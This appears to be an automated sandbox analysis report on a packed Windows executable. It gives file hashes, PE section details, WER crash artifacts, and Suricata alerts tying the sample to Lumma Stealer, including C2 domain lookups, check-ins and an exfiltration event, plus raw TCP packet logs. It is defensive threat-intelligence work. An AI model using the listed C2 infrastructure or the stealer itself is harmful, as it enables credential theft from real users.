                                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.0.6.8.9.0.9.1.0.3.2.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.0.6.8.9.2.2.6.9.6.9.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.3.d.8.0.6.0.-.e.e.5.7.-.4.2.e.c.-.a.a.1.8.-.5.b.d.b.c.c.f.f.a.f.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.2.4.1.5.d.3.-.7.a.1.b.-.4.0.4.2.-.b.1.8.7.-.6.4.d.c.a.b.c.6.7.b.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.I.3.T.a.f.e.l.p.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.4.-.0.0.0.1.-.0.0.1.4.-.a.5.4.e.-.7.3.1.8.f.f.5.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.b.2.7.e.3.7.e.1.4.7.4.d.5.e.4.5.b.5.7.e.f.a.8.c.f.e.a.1.6.f.f.0.0.0.0.f.f.f.f.!.0.0.0.0.3.5.7.9.2.9.c.c.d.8.3.d.7.c.3.0.4.5.d.1.1.b.8.0.0.7.0.f.9.5.8.b.9.e.a.e.4.0.e.b.!.E.I.3.T.a.f.e.l.p.V...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERABF0.tmp.dmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 05:54:51 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):290074
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.4976730740684978
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:BMq0+zqBBIBv6dznDSvNnUg9+5wrIbNkr3oW8mM1Kd8:6q0+z9v6JDuNnUa+5OIa3oD1Ky
                                                                                                                                                                                                                                                                                      MD5:F981A997DA9326356068F4B0105C03C2
                                                                                                                                                                                                                                                                                      SHA1:F9592F8E33F9636403F747914557E256D62B54D8
                                                                                                                                                                                                                                                                                      SHA-256:E130DF26FF2B9CFE266720EBF93679C9F87089465B96D60D20E41D44AC0EF698
                                                                                                                                                                                                                                                                                      SHA-512:ED1B5045EB91F84C8667B2F021ED1B0E9DD814903A1B549DB1345FBB8420245BAFFFE5A0778DE31706F9467F3EF48BAF5F0D4B182CEF102F7BEF993734A476BB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:MDMP..a..... .......+.hg.........................................'..........H...........`.......8...........T...........xL... ..........$)...........+..............................................................................eJ.......+......GenuineIntel............T.......d.....hg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERADC5.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8382
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.700444171349334
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJ2K686YcDpSU98epgmfVOWpr689bsgsfspEm:R6lXJT686YuSU98ggmfVXszfsv
                                                                                                                                                                                                                                                                                      MD5:B31B6B418126978B899879E5CD9F304A
                                                                                                                                                                                                                                                                                      SHA1:9B01AF33AA81E57971993D7BE543186DCA32F7B0
                                                                                                                                                                                                                                                                                      SHA-256:77B9F42DC05D455338516142F52C873B721CE132B775F6DCF13AD656895DB030
                                                                                                                                                                                                                                                                                      SHA-512:80FD75F64A2E02FB7373EB1AC75AC2D6200CBF9A05F1CAA390B9D0C3627B3AE7B18B343EA893705D67E9822C519BC378E65A07BB0E4C012C4A50E9045226A143
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.2.4.<./.P.i.

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE05.tmp.xml

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4624
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4982436346293975
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsnXJg77aI9f0WpW8VYNYm8M4Jc0KLBFX+q8W667w8PIYyRziRed:uIjfn5I7Jt7VFJcz7nnwWR4zoed
                                                                                                                                                                                                                                                                                      MD5:32679906896BCFABD346D5974B8394C6
                                                                                                                                                                                                                                                                                      SHA1:4C36CF00EA4D3D5B74E89A69ED7FC3DE616CC39C
                                                                                                                                                                                                                                                                                      SHA-256:FCDDA60BD6F720E9F1E1349A5DA08063920F18B5310AE2BCAADB8A04AD2FF64B
                                                                                                                                                                                                                                                                                      SHA-512:3357A92F3E0C7E61AF2145A9E881190B143E34E621C595787D9EE560536AF4C6D4D2D479EC8B94A8771D916A9181512B5BD7841020E5ED2BC1D5A181D2239943
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643497" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.393751439843368
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:9l4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNArOBSqa:z4vF0MYQUMM6VFYSrU
                                                                                                                                                                                                                                                                                      MD5:C473D770F2651B8A27ACEA1AE542D567
                                                                                                                                                                                                                                                                                      SHA1:A02016EB487EB8EE7775AE7E3F06C919661373BE
                                                                                                                                                                                                                                                                                      SHA-256:17A4C468A9121C4C9139A5BE5D4E8C84636CCDB34163B1EB02FC090677EF6CEA
                                                                                                                                                                                                                                                                                      SHA-512:5F49572E031715244718E051784D1840A56F332A4E013FBB9053A2281717615E91B5DC3D893DF392B89BF1C34B96155A0ACFE63C60BAF2D8E45BCF7935CD7FAE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..R..T................................................................................................................................................................................................................................................................................................................................................E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.507010303576136
                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                      File name:EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      File size:2'959'360 bytes
                                                                                                                                                                                                                                                                                      MD5:b611471d0d1a21a64700e0a8a9631761
                                                                                                                                                                                                                                                                                      SHA1:357929ccd83d7c3045d11b80070f958b9eae40eb
                                                                                                                                                                                                                                                                                      SHA256:f1d21ab1bb0a7554c8958538cbc474e48e9ceccd57b7744b5c76fe7f53c5f5ac
                                                                                                                                                                                                                                                                                      SHA512:42e9fc1c46985d0d5067a463bc21899b0c143bd513f97a212d6c0f26d3530997fe83f35b059f163c66e557bcf8dfa08b022883577ddc065181a65cf3b0ee2f04
                                                                                                                                                                                                                                                                                      SSDEEP:49152:4viSvLcnpD3UiWIggG6I5AL1SYvxG+in/Asp:4vdvLcnpDEiLhG6TLwYw+i/V
                                                                                                                                                                                                                                                                                      TLSH:D7D53BA2BD0676CFD48F16789827CD42595E03BA4F144CC3D86EA5BABD63CC019F6E24
                                                                                                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................0...........@..........................00.....+4-...@.................................T0..h..

                                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Entrypoint:0x700000
                                                                                                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                      Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                      jmp 00007F022CD5B4CAh
                                                                                                                                                                                                                                                                                      clts
                                                                                                                                                                                                                                                                                      sub eax, 00000000h
                                                                                                                                                                                                                                                                                      add cl, ch
                                                                                                                                                                                                                                                                                      add byte ptr [eax], ah
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [edx+ecx], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                      0x10000x510000x2480020b419132000667993eab10511e45088False0.9973980629280822DOS executable (COM)7.982543435842359IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      wlupjtcj0x540000x2ab0000x2aa8004ed1e5ca157bf64a7f7efc85f58bb546unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      xmrfofho0x2ff0000x10000x4002a384a41055ad60a588afa4fddfbb41aFalse0.7548828125data5.8662610941977364IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .taggant0x3000000x30000x22001bfc3f0f5ff03b2f59b8e44c8dab2e78False0.06514246323529412DOS executable (COM)0.8089966782897381IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                                      kernel32.dlllstrcpy

                                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:16.109653+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.9604101.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:16.252298+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.9591041.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:16.395708+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.9602781.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:16.550467+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.9597691.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:16.728179+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.9569101.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:16.868933+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.9549781.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:17.128166+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.9530561.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:17.289699+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.9603391.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:17.433895+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.9568931.1.1.153UDP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:19.124305+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94970723.55.153.106443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:19.888096+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.94970723.55.153.106443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:21.542638+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949708172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:22.287398+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949708172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:22.287398+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949708172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:23.537982+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949709172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:24.309675+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949709172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:24.309675+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949709172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:25.937610+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949710172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:26.897556+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949710172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:28.188689+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949711172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:30.828440+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949712172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:33.747023+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949715172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:36.849724+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949716172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:42.528311+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949717172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:43.603147+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949717172.67.157.254443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:45.533242+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949718185.166.143.49443TCP
                                                                                                                                                                                                                                                                                      2024-12-23T06:54:48.047053+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94971952.216.41.233443TCP

                                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.725676060 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.725722075 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.725802898 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.729259014 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.729280949 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.124209881 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.124305010 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.126800060 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.126806021 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.127115011 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.185875893 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.197758913 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.239329100 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.888142109 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.888168097 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.888175011 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.888195992 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.888206959 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.888236046 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.888247967 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:19.888318062 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.066222906 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.066289902 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.066395044 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.066401958 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.066459894 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.096601009 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.096666098 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.096714973 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.096724033 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.096820116 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.096822023 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.096875906 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.120271921 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.120290041 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.120301008 CET49707443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.120306015 CET4434970723.55.153.106192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.322058916 CET49708443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.322089911 CET44349708172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.322170973 CET49708443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.322484016 CET49708443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.322496891 CET44349708172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:21.542562008 CET44349708172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:21.542638063 CET49708443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:21.546260118 CET49708443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:21.546271086 CET44349708172.67.157.254192.168.2.9
